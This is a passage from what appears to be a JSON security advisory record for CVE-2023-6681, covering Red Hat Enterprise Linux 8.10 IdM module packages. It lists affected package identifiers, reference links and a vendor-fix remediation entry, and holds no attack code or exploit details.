"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19692+fac39a03.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19634+c162f948.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0:0.12-3.module+el8.9.0+19692+fac39a03.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-0:5.1-12.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-0:1.0.0-9.1.module+el8.9.0+18920+2223d05e.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.x86_64::idm:DL1"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-6681"
},
{
"category": "external",
"summary": "RHBZ#2260843",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2260843"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-6681",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6681"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-6681",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6681"
}
],
"release_date": "2023-12-28T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-05-22T11:47:22+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-0:4.9.13-9.module+el8.10.0+21691+df63127d.src::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.src::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64::idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64::idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0:0.12-3.module+el8.9.0+19634+c162f948.noarch::idm:DL1",
